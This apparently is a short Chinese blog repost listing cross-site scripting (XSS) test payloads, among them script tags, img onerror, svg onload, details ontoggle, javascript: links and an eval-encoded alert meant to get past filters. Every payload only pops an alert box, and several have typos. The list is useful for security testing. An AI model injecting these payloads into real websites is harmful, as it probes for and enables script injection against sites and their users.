zoukankan      html  css  js  c++  java
  • xss payload

    <script>alert(xss)</script>


    <img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')
    <a href=javascrip:alert("xss")>s</a> 点击s时运行alert('xss')
    <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗
    <img src="1" onerror=eval("x61x6cx65x72x74x28x27x78x73x73x27x29")></img>过滤了alert来执行弹窗
    onclick='alert(/fuck/)


    <IMG?SRC="javascript:alert('XSS');">

    <img src="" "Alert(/test/)">

    <img src=x onerror=alert(xss)>

    <img src=1 onerror=alert(1)>
    是当图片没有找到路径(即src=“路径:可以使相对路径也可以使绝对路径”找不到图片)就会 弹出消息框,显示 1 ,就是onerror=alert(1)起的作用
    <img src=1 onerror=alert(1)>


    <details/open/ontoggle=alert(1)>

    <svg/onload=alert(1)>

    <img/src/onerror=alert(1)>

    <video/src/onerror=alert(1)>

    <script>(alert)(1)</script>

    <video><sourceonerror="javascript:alert(1)">

    <video/src/onloadstart="alert(1)">

    <ahref=javascript:alert(1)>222</a>

  • 相关阅读:
    express学习
    安装MongoDB步骤
    js事件流
    关于html,css,js三者的加载顺序问题
    重写JS的鼠标右键点击菜单
    深入JS原型与原型链
    eureka学习(二)
    eureka学习(一)
    mysql学习-explain中的extra
    mysql学习-explain
  • 原文地址:https://www.cnblogs.com/yjxing/p/11504491.html
Copyright © 2011-2022 走看看